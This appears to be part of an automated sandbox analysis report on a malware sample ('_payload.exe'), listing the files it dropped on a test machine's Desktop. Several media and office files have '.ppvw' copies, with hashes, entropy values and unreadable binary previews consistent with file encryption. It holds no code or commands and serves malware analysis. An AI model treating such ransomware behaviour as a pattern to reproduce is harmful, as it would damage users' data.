                                                                                                                          Preview:BPMLN...b.....Q.......x.....m.H...q...z..@.<..,U....^O).."..M.....a.l..G.p..^.B.&E.x...n.3.l..8.G.'.w......h,...M...v..N..G!..._x....0j.x..w@...?..v....G.y..u{...#`.^$.n.*.]......z..v.@...].rS......^..mq2;-.^.g}.na...t._...]gm8.?;..T.{.EQ.=;..n..d2..JF..z.0O.i..t..b.[..PK...*>.e..R...c.B..E7<.....8.;I..q^....Y.zt.........&....c"O.../..H.#.!R.2Y.m....>.u..H..`.z.7Q{..?%...[U...k.?...p.Q..m.o..~...z.Ad......#.f........%K.....#'.<....j...e...^.e[..'...\|g....?...I ...e..)..f.v\J.X.w.m..l.......u......%.B~...b..@.9.rM.].8H.>....L.&.......T...j..mB.l&.z...'....GO.8...|./..Lg-F.......y"@.}t....sT....8x1{!..3B...%.4I....b..R.4.W.{.T J.............U....[.^h......g.J...)..t..H...}..Y>..>!..a.1..J-.%.r..*..2./...?.s.....8.=IA..\.l...<...2../p....~.1.[..2...q..N..LCU.e......5.F.au.i...j_.T.mz.#Bb8..m...%..I"..v....}..h..$....1.].....1.....D....7...VD|'c.:X*.._..G..WO...>:Z..........:..1..jR.rx....nGB........v..[......Y.9..q]C....5`8A.u!.Y/...

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856799023999084
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jc5CuCEloNi0ZBia9IPBwa4I6SS5PUayW/JH/VCYikmx58kMqyDI81jm2GbD:jccuCEloN11IR41pUaVJfVkxJYbHUD
                                                                                                                          MD5:1F85DE070B88AF338A30371C607B34A0
                                                                                                                          SHA1:424664DCA568F9178490C30CE54A1CB1CBBD50A3
                                                                                                                          SHA-256:65A93DBD8BC442B086096B7F89A4E1470BC8629B06EA91D3DFABB211B8135609
                                                                                                                          SHA-512:D8DC8D8E75171ED26AC204CD2EE724BD551E0939E2B3657A06D74D205707EC0C2894EB4B3B2759CDB7AB92137909AD9A8A34C282AD4F537AE6653DED9F588AD7
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVvr7J.{..I\)..z.ANP.~..m...-..2...g.tKm.. |i.<. Y..Z.[.7j8..Q#..G.[.0..u..1....J..c.....@...[.. f)}.Z.....F7..Ty....g'-..../..H&BLK..>......e.}.G..=M..]...vS:...]P.5...Tm.......Na(.h.:;G.L3..e..."..2....b.6uL`8..:.Z...b.......,.....t..z.m:..[Y...8.&@}.....k8h.s..<p) j[sj.gF......."_...:.^4..ZyxK.....#....@H...J..8xrK..O3,(...~.....x..s....cC.S>xd%.70o...#..(.'....L.V.]0.6s.-#`.qq?!v.in3rL1...q.q.\...b...a..~.e8.T.......l.:.=g.".O\*...J_&.bs....D....}.^.BR....efi].y2.......G....G..&5....3.[...[.'."i9....P.....>K...O.[|?.....b....$c?..2Hb.j.RQ.J.C..1..#=..<..)...-...-....|.`.iF..k"..|#.e<...Q#QW...$......^W.h.S.,..,....Ks.s.....J..!.p.o.%.83....V.I..{.R;....c..M2..:..\..Dq.~.....{oe.....*u.....qY..C.w.N...^x....I...{..H.I....n?...*A7M.&.C_\.l....GcM......b.6......a.....Xq....N.qw......h.'~..A.i.'....z^.....[H.=..e..H3......G..".L....&z'.d.?...j....S._.-9&...cDq%..M..l.#....+-&....n,68.....gQ}.U./..kpv?.J~......c`.W....\......1.,.V.F.`%c.7N

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856799023999084
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jc5CuCEloNi0ZBia9IPBwa4I6SS5PUayW/JH/VCYikmx58kMqyDI81jm2GbD:jccuCEloN11IR41pUaVJfVkxJYbHUD
                                                                                                                          MD5:1F85DE070B88AF338A30371C607B34A0
                                                                                                                          SHA1:424664DCA568F9178490C30CE54A1CB1CBBD50A3
                                                                                                                          SHA-256:65A93DBD8BC442B086096B7F89A4E1470BC8629B06EA91D3DFABB211B8135609
                                                                                                                          SHA-512:D8DC8D8E75171ED26AC204CD2EE724BD551E0939E2B3657A06D74D205707EC0C2894EB4B3B2759CDB7AB92137909AD9A8A34C282AD4F537AE6653DED9F588AD7
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVvr7J.{..I\)..z.ANP.~..m...-..2...g.tKm.. |i.<. Y..Z.[.7j8..Q#..G.[.0..u..1....J..c.....@...[.. f)}.Z.....F7..Ty....g'-..../..H&BLK..>......e.}.G..=M..]...vS:...]P.5...Tm.......Na(.h.:;G.L3..e..."..2....b.6uL`8..:.Z...b.......,.....t..z.m:..[Y...8.&@}.....k8h.s..<p) j[sj.gF......."_...:.^4..ZyxK.....#....@H...J..8xrK..O3,(...~.....x..s....cC.S>xd%.70o...#..(.'....L.V.]0.6s.-#`.qq?!v.in3rL1...q.q.\...b...a..~.e8.T.......l.:.=g.".O\*...J_&.bs....D....}.^.BR....efi].y2.......G....G..&5....3.[...[.'."i9....P.....>K...O.[|?.....b....$c?..2Hb.j.RQ.J.C..1..#=..<..)...-...-....|.`.iF..k"..|#.e<...Q#QW...$......^W.h.S.,..,....Ks.s.....J..!.p.o.%.83....V.I..{.R;....c..M2..:..\..Dq.~.....{oe.....*u.....qY..C.w.N...^x....I...{..H.I....n?...*A7M.&.C_\.l....GcM......b.6......a.....Xq....N.qw......h.'~..A.i.'....z^.....[H.=..e..H3......G..".L....&z'.d.?...j....S._.-9&...cDq%..M..l.#....+-&....n,68.....gQ}.U./..kpv?.J~......c`.W....\......1.,.V.F.`%c.7N

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.826259435301149
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3RxVxXCpLrc9+otdszWATdvBvaADRnX98pGwsmb6FJNGbD:3lhCp4ndBAZv1aAVX9mGwsk6LqD
                                                                                                                          MD5:610123D99EB760912EF49EA2281EFA99
                                                                                                                          SHA1:12843789FE8F1F49333110A43DF9BDFBC7C768DE
                                                                                                                          SHA-256:74E254BA9A013D030F61C972B02A99F3C43D738D4B92D518DBFF61F1ADA8A287
                                                                                                                          SHA-512:B7EB118BB897967068DAD7CF59C18003FA9EE7890ED685BA4963C28136843B3D189FE8FC8BCC0081ADFC3006FA5BB684193B8EE7734757C534743FC803E9BD89
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV..KdH-)3.H.I.....*S....2.S.'..`e.=T....3.|<_..a=X..`#.E/..i......E.....m..1K"v...............p...N..%..,3R...@'.".>..U..."(....d.......V.cX.S7g`.P..-77.,...*pH...W~...v.M..=...8.o.!.......X=.(.....y.C......L.X.p.N......)..Rp.$QK.T-P....7....8.........j.p...$.v.....:...c......f.i.......=...._.....F..]...j9..@..d.....p..g0.=...h\.I.^.{.X+.I.i..U...k.>K....^.W.."....Q...u...L....>..D.{Y.>.\1.hhR.......[..$..!..HV.8....`..@@Er....H...k.@+G[.=...T....M...../#e..AP.W..'.q...XES.clTo..SN-\s...............W...iEF.....B....N...!..o3...`%.r...tD}.....5.......Hyt3.I...|....|.D.J4..w.....A...4..y..Q( .. ..).N:ol.....&.W...U{.....Q.*c:...Gw...&?...!l.NC.....\d..kq.~joK.l.h....0..(z.b......Df.99,..... w)../.....t~.N.}..G.@..F.Y.H...T....x.s~Bo...I.y....kD.2.mr\P...7..^V.Q.."L....ua.d...%.....K..P<yt....Q.5HDk."h....$o..j..L..6..XDF`....l....k.I.91G..p>.z5.f.yE...cm.....,..G..e..&./K.tY...M.+..q.Q[.X^.M.....dx_&.>....J.\..B..5..4N.I.O.

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.826259435301149
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3RxVxXCpLrc9+otdszWATdvBvaADRnX98pGwsmb6FJNGbD:3lhCp4ndBAZv1aAVX9mGwsk6LqD
                                                                                                                          MD5:610123D99EB760912EF49EA2281EFA99
                                                                                                                          SHA1:12843789FE8F1F49333110A43DF9BDFBC7C768DE
                                                                                                                          SHA-256:74E254BA9A013D030F61C972B02A99F3C43D738D4B92D518DBFF61F1ADA8A287
                                                                                                                          SHA-512:B7EB118BB897967068DAD7CF59C18003FA9EE7890ED685BA4963C28136843B3D189FE8FC8BCC0081ADFC3006FA5BB684193B8EE7734757C534743FC803E9BD89
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV..KdH-)3.H.I.....*S....2.S.'..`e.=T....3.|<_..a=X..`#.E/..i......E.....m..1K"v...............p...N..%..,3R...@'.".>..U..."(....d.......V.cX.S7g`.P..-77.,...*pH...W~...v.M..=...8.o.!.......X=.(.....y.C......L.X.p.N......)..Rp.$QK.T-P....7....8.........j.p...$.v.....:...c......f.i.......=...._.....F..]...j9..@..d.....p..g0.=...h\.I.^.{.X+.I.i..U...k.>K....^.W.."....Q...u...L....>..D.{Y.>.\1.hhR.......[..$..!..HV.8....`..@@Er....H...k.@+G[.=...T....M...../#e..AP.W..'.q...XES.clTo..SN-\s...............W...iEF.....B....N...!..o3...`%.r...tD}.....5.......Hyt3.I...|....|.D.J4..w.....A...4..y..Q( .. ..).N:ol.....&.W...U{.....Q.*c:...Gw...&?...!l.NC.....\d..kq.~joK.l.h....0..(z.b......Df.99,..... w)../.....t~.N.}..G.@..F.Y.H...T....x.s~Bo...I.y....kD.2.mr\P...7..^V.Q.."L....ua.d...%.....K..P<yt....Q.5HDk."h....$o..j..L..6..XDF`....l....k.I.91G..p>.z5.f.yE...cm.....,..G..e..&./K.tY...M.+..q.Q[.X^.M.....dx_&.>....J.\..B..5..4N.I.O.

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.860718633798251
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XwdS21DIX3HUOAZOm+9VrDvyYqQrxDI3tyzKL2vlCmx10oPXLissYfGbD:ASEJcmavyYjrQ6vlVP0iOdYfUD
                                                                                                                          MD5:59082DE7E732C0FA6F2157E9641C9DD6
                                                                                                                          SHA1:0CEB995FF4606924D24D4322E81005F9C83E0FCC
                                                                                                                          SHA-256:5C93C71328DC85D5A02C6BFC364988B8E5DAF2715EAE5E52FC678B4B91888006
                                                                                                                          SHA-512:5C975A695318A4D06F8EA1C198815FCEF456EE4587D8A8AEBC2AA531FC946743F6FC56222F235773A0B1A59E1035D4E93EDDC925E6710B7990E2EC48B342F005
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVp>....f..qU.,GX)...+....I..6.w.Q...".i.K5........A<.....ZZ..h.....c........Gy....../.G....3...3.A.-...^..C.-....*P.(.o...`.S....r...i.t..V..O...HWnp.]-..F...g.TP.K.,D)l...`.yg..]kt..D..=y.v....>..8.].5o...xzB..J.>I.Y....b..^.EV...!..v..Q..c.U.Q.@...U}*.F....H....c&...........(......O.)...C.a..].X0;...Q=.zp`6....K.......?zI.f..g.O.~O!.{......".c...e..m.K.....1.r......b.[.?po.@A.....`..0.mCE.a.PA..M.$...... .}.@.o....] ...~.......7t...}.. ...`..'w....o...7......3q:.....7f.4O.#.....C...={......J..Rw..{:..Dq.-.....jCs..n....1..y<H..a(..o.B.%....A..4...c.E.j....k.d.io...W......s..rU$.<....:.Y.J.../W.k.i.1.,(.9|..........:...\m.[....w.>."...U.1f......s.XT.c...X.1......!m...~...!..T9a......Vy.)1........zt..A.(.I.. ...|...z..V..^.i...8.z....$..3.aS......MB..?=Br...h.tu;R..8.P..tNx......0m%..{p+>..(.).....r*.?9./....yt'..NE.oF...w.....-%..j.&`:...%..J...;..!E...F....i.1:.NE0'....L..}.@..r..~..;...].$.._."H.eD.%.7 .B$...A[.GkDkw.O.M.

                                                                                                                          C:\Users\user\Desktop\HTAGVDFUIE.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.860718633798251
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XwdS21DIX3HUOAZOm+9VrDvyYqQrxDI3tyzKL2vlCmx10oPXLissYfGbD:ASEJcmavyYjrQ6vlVP0iOdYfUD
                                                                                                                          MD5:59082DE7E732C0FA6F2157E9641C9DD6
                                                                                                                          SHA1:0CEB995FF4606924D24D4322E81005F9C83E0FCC
                                                                                                                          SHA-256:5C93C71328DC85D5A02C6BFC364988B8E5DAF2715EAE5E52FC678B4B91888006
                                                                                                                          SHA-512:5C975A695318A4D06F8EA1C198815FCEF456EE4587D8A8AEBC2AA531FC946743F6FC56222F235773A0B1A59E1035D4E93EDDC925E6710B7990E2EC48B342F005
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVp>....f..qU.,GX)...+....I..6.w.Q...".i.K5........A<.....ZZ..h.....c........Gy....../.G....3...3.A.-...^..C.-....*P.(.o...`.S....r...i.t..V..O...HWnp.]-..F...g.TP.K.,D)l...`.yg..]kt..D..=y.v....>..8.].5o...xzB..J.>I.Y....b..^.EV...!..v..Q..c.U.Q.@...U}*.F....H....c&...........(......O.)...C.a..].X0;...Q=.zp`6....K.......?zI.f..g.O.~O!.{......".c...e..m.K.....1.r......b.[.?po.@A.....`..0.mCE.a.PA..M.$...... .}.@.o....] ...~.......7t...}.. ...`..'w....o...7......3q:.....7f.4O.#.....C...={......J..Rw..{:..Dq.-.....jCs..n....1..y<H..a(..o.B.%....A..4...c.E.j....k.d.io...W......s..rU$.<....:.Y.J.../W.k.i.1.,(.9|..........:...\m.[....w.>."...U.1f......s.XT.c...X.1......!m...~...!..T9a......Vy.)1........zt..A.(.I.. ...|...z..V..^.i...8.z....$..3.aS......MB..?=Br...h.tu;R..8.P..tNx......0m%..{p+>..(.).....r*.?9./....yt'..NE.oF...w.....-%..j.&`:...%..J...;..!E...F....i.1:.NE0'....L..}.@..r..~..;...].$.._."H.eD.%.7 .B$...A[.GkDkw.O.M.

                                                                                                                          C:\Users\user\Desktop\KATAXZVCPS.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845953286876405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:BJVusZoC4TxLT+JdXBXo+LXZoDbkf0guU9XvpdcipsRyDwbr3LHGx+so5gHKmbD:Bj34ThIxjibkf0M9RiV08br3LiC5w7D
                                                                                                                          MD5:B64A50C068502D10E2B2004B3A7EFC07
                                                                                                                          SHA1:AF5C60883B99939EECABE83252C4F857DAD79ABF
                                                                                                                          SHA-256:126FCCB5781E5621F4C4389D312CBA5E409441F9DB8F7303F18363DF55DFDF0F
                                                                                                                          SHA-512:EB7E2554567E179F2ABF34B83F68376EA366A867284D070F783A539F641E98F985DEF2A9A2194A71384F347BB70E37752C887B2CDAA47F62B0DD7F958D3FA578
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX...\.@.&c.[H.....v.k..@5.y..E.P..+.%..7..=.y.......=.....'.@4.cl@V..d.b.MF_.R..X...V...%....#.. .....'....;..i..E....~(.....W..V.(s..>l..bz...Zq..[.)..[...;2..c.+.j1..q.....T.A.`. ...X8+......./-.\E.Q.......7z..}4..R.,..T.\.....u.3.{,GT.}../6..........2...<!.......9. ...M7..[./o.w.@.@..(......~T.....4.<`..4..^...8.PAt.....6..~.T?..."....@.c.<..+t...]..... 0.z.Y..<.Nke^.U.oK../...o.d...F...:Y.....6J(11{.-..y..m.N_...q5.6.v`..<...r,...Ic.x...[h..EW..lH.E.[...0..s.X...mI.=.9............(...^~...rsq<..*W.bbL&....L...v|./......G.D.n.F.f.`E/|.D.fD|...HB.?$W.L...<.zlM.......=3)OZ...5..$=..l.A..s.."{OU..?...i?....H67...*i."e..Z.6Z\.Dk..%c.....b.)5....N.n...v3..&..l..".ZA.j.....W.b.5..T.UB?:.....Uu.1.G..^@.m"..".y2.....1.2...w...=..._..d.H..`~.R..(0h^l.~...7...o.'.....D..XA.?.LE./.6..8....HF.....q.0.c..|...@$.[5.U#=).6... ./"...s..Vs Ro..6...\yq.....^.z[.......N.n.!z..5.b...us.....D..~.WZ..'1.$..Q... ...+.*X.fM../{q..l;=.F.`v....

                                                                                                                          C:\Users\user\Desktop\KATAXZVCPS.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845953286876405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:BJVusZoC4TxLT+JdXBXo+LXZoDbkf0guU9XvpdcipsRyDwbr3LHGx+so5gHKmbD:Bj34ThIxjibkf0M9RiV08br3LiC5w7D
                                                                                                                          MD5:B64A50C068502D10E2B2004B3A7EFC07
                                                                                                                          SHA1:AF5C60883B99939EECABE83252C4F857DAD79ABF
                                                                                                                          SHA-256:126FCCB5781E5621F4C4389D312CBA5E409441F9DB8F7303F18363DF55DFDF0F
                                                                                                                          SHA-512:EB7E2554567E179F2ABF34B83F68376EA366A867284D070F783A539F641E98F985DEF2A9A2194A71384F347BB70E37752C887B2CDAA47F62B0DD7F958D3FA578
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX...\.@.&c.[H.....v.k..@5.y..E.P..+.%..7..=.y.......=.....'.@4.cl@V..d.b.MF_.R..X...V...%....#.. .....'....;..i..E....~(.....W..V.(s..>l..bz...Zq..[.)..[...;2..c.+.j1..q.....T.A.`. ...X8+......./-.\E.Q.......7z..}4..R.,..T.\.....u.3.{,GT.}../6..........2...<!.......9. ...M7..[./o.w.@.@..(......~T.....4.<`..4..^...8.PAt.....6..~.T?..."....@.c.<..+t...]..... 0.z.Y..<.Nke^.U.oK../...o.d...F...:Y.....6J(11{.-..y..m.N_...q5.6.v`..<...r,...Ic.x...[h..EW..lH.E.[...0..s.X...mI.=.9............(...^~...rsq<..*W.bbL&....L...v|./......G.D.n.F.f.`E/|.D.fD|...HB.?$W.L...<.zlM.......=3)OZ...5..$=..l.A..s.."{OU..?...i?....H67...*i."e..Z.6Z\.Dk..%c.....b.)5....N.n...v3..&..l..".ZA.j.....W.b.5..T.UB?:.....Uu.1.G..^@.m"..".y2.....1.2...w...=..._..d.H..`~.R..(0h^l.~...7...o.'.....D..XA.?.LE./.6..8....HF.....q.0.c..|...@$.[5.U#=).6... ./"...s..Vs Ro..6...\yq.....^.z[.......N.n.!z..5.b...us.....D..~.WZ..'1.$..Q... ...+.*X.fM../{q..l;=.F.`v....

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.833197701396306
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xz1HJAqGs9Dvqf6iNEkzLq3pyWmfGm+/6wnSnGtSczMrNLwVyX0QVWbD:D1pgyiNDapdAbbwnMGWLwVyX0tD
                                                                                                                          MD5:140725A737C9EFBF79C5BA9697D03613
                                                                                                                          SHA1:4E3EA05D974CABA85801D8DCF7B129ACB5BE9122
                                                                                                                          SHA-256:25420983A783540B76D669C2CBB0EDCE471F7D91BE748335BC54672F12375238
                                                                                                                          SHA-512:0D5E479DE388B8AF86193C24E010326325FDD75DE290EA366A888C7D7AB765B105F9CB641CDB7526C18B71B4D49E28538EDCBFDBB098843E52C8E8CE45692F67
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNVp|&X0g...#w^.X...A./...^.K.{..-Kc....L.^...L5.p.......g.v..A...}.R..h. WR2O,....._......p.4...e..:../..:..c.g....r...\t.#............Iw.Wk...tSe'.8..Df.'j...,m@..Y.2.......{.....P.PW.%...|[D...}.wG._YTnj.Fk..>..&[.T...u.&T..=t..=...$....6@.....l..+u.7..JA..{.. .%...S.J..^.E..c.Hb6.e..wB.F....($.%...Zz`..!.I.a..~.E6.....w...I.{7.dq...........o4...U....M.E...*C'Ij..........p....w.0..N.%..s`Na.h.#..m....o.....j.2=..G.. ...O.O........Z.*=.. G^"b...#B...........K^...s..X4...K.l.J......t.......0....P..........5IG....\.Z...v[....J.zU=..6O.w..S........n2.<....PB."......U....D.+}.>...k.?....l......'?y.*...6qH....%/.].u|~...Z........!p.uHh...+.....Y@g..RYN.........4.0!&!d.cg.9.`..].6...a..#.@l...G...D.r.x<..w..f..t......h..^w...3.i/...~..;W..K.}..#H<........,.|...z.2w_.8.?......m.~..=0...x.vp[...2.~.. m.?v....e..r...G..R.6-.._B<z4Nr.(..V...:(g.U..|...z...>...u+u+..}.@{j.dyVS...T.._....+.b...q..%R..@b.N....!... ........L..=....Y.D...W....#]"..

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.833197701396306
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xz1HJAqGs9Dvqf6iNEkzLq3pyWmfGm+/6wnSnGtSczMrNLwVyX0QVWbD:D1pgyiNDapdAbbwnMGWLwVyX0tD
                                                                                                                          MD5:140725A737C9EFBF79C5BA9697D03613
                                                                                                                          SHA1:4E3EA05D974CABA85801D8DCF7B129ACB5BE9122
                                                                                                                          SHA-256:25420983A783540B76D669C2CBB0EDCE471F7D91BE748335BC54672F12375238
                                                                                                                          SHA-512:0D5E479DE388B8AF86193C24E010326325FDD75DE290EA366A888C7D7AB765B105F9CB641CDB7526C18B71B4D49E28538EDCBFDBB098843E52C8E8CE45692F67
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNVp|&X0g...#w^.X...A./...^.K.{..-Kc....L.^...L5.p.......g.v..A...}.R..h. WR2O,....._......p.4...e..:../..:..c.g....r...\t.#............Iw.Wk...tSe'.8..Df.'j...,m@..Y.2.......{.....P.PW.%...|[D...}.wG._YTnj.Fk..>..&[.T...u.&T..=t..=...$....6@.....l..+u.7..JA..{.. .%...S.J..^.E..c.Hb6.e..wB.F....($.%...Zz`..!.I.a..~.E6.....w...I.{7.dq...........o4...U....M.E...*C'Ij..........p....w.0..N.%..s`Na.h.#..m....o.....j.2=..G.. ...O.O........Z.*=.. G^"b...#B...........K^...s..X4...K.l.J......t.......0....P..........5IG....\.Z...v[....J.zU=..6O.w..S........n2.<....PB."......U....D.+}.>...k.?....l......'?y.*...6qH....%/.].u|~...Z........!p.uHh...+.....Y@g..RYN.........4.0!&!d.cg.9.`..].6...a..#.@l...G...D.r.x<..w..f..t......h..^w...3.i/...~..;W..K.}..#H<........,.|...z.2w_.8.?......m.~..=0...x.vp[...2.~.. m.?v....e..r...G..R.6-.._B<z4Nr.(..V...:(g.U..|...z...>...u+u+..}.@{j.dyVS...T.._....+.b...q..%R..@b.N....!... ........L..=....Y.D...W....#]"..

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.852161649075477
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:h30iqUifnzqAvVkXeeY4UsAGxYEf1RcDn3iR0a8UJ/DdBMkv9xZ3yZtlL3sbD:hWUiPmAtkXetnGxYdDSR030B98ZCD
                                                                                                                          MD5:DAE456A63EE251E8FDE2AC4D09FC2439
                                                                                                                          SHA1:BB80442C45EAAA4274F2D2C145F5542602D8FC24
                                                                                                                          SHA-256:1CB0C935A9BB792D9D218639FC350B9E820F2B8A414BF15FD206153C381FC4EC
                                                                                                                          SHA-512:FE4ADCF030954FAF76C6B372312C490B5FD493994C19DA112F685455FC61797BDADBC92957AFE300271C31FD67696B7AE21BAAEBEE9F819B11A754B8E60192F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN..C/.$.S..;I.....W..^.r..3.^30VP,.y.gA.^~'.`.e..i-/.e..H<...V..4..0].....u..GL..Q...`..gQ)>o.......L......\'.Z.*.[%.....bEm......O...q..q..Y.*u.;.H..eF*...0.....W.R.(.s....2M.....k.!..w....hQ4n..$..m^A.!.+<....X..]...t*..6..ej.F"........L&6....E..X.O.P.....4>..Zq.7..lf..:.$......./2:.....T .7..Q_[OA.h.....yx.Z.9j.. ..B.~T5..J....v...).Z|.Y.Re...94Vq....]...pQI:...Yg.o...q..u...u....Wj.wzA.*.Z8......S.].C.........T...}....p0.nP..|S......K.jv..>.Gf...@..=.8...+.....I.....U....8!o.7....p...h. Rs...~.R...6.}.+X.F.<..p.._A....Mp...<.\....].Sv.BJ)..V.....++...I........=.:.@u+B..[.....:..1.-.....6N.>7&.h.R[u.......m.&.J./.;J.R)T.....|..[....uG7..._...+d\t..J.;...-E...........*......P. .Y.%&.....z.N...p,........q'..:....j.@."..w0..pE..^....@C.....+.M.d._D7..Qw.%..k.X....(:pq%cj*..w.....o.ATn.b....`..B....p..;.;...H...........V\.W.. .f..>,.......oV.x{.9..{...IbH|x.c.... ,...wM.L.......7.h(.n.W..$H.2.......a.....cP..7I.a.D.7....8,..

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.852161649075477
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:h30iqUifnzqAvVkXeeY4UsAGxYEf1RcDn3iR0a8UJ/DdBMkv9xZ3yZtlL3sbD:hWUiPmAtkXetnGxYdDSR030B98ZCD
                                                                                                                          MD5:DAE456A63EE251E8FDE2AC4D09FC2439
                                                                                                                          SHA1:BB80442C45EAAA4274F2D2C145F5542602D8FC24
                                                                                                                          SHA-256:1CB0C935A9BB792D9D218639FC350B9E820F2B8A414BF15FD206153C381FC4EC
                                                                                                                          SHA-512:FE4ADCF030954FAF76C6B372312C490B5FD493994C19DA112F685455FC61797BDADBC92957AFE300271C31FD67696B7AE21BAAEBEE9F819B11A754B8E60192F7
                                                                                                                          Malicious:false
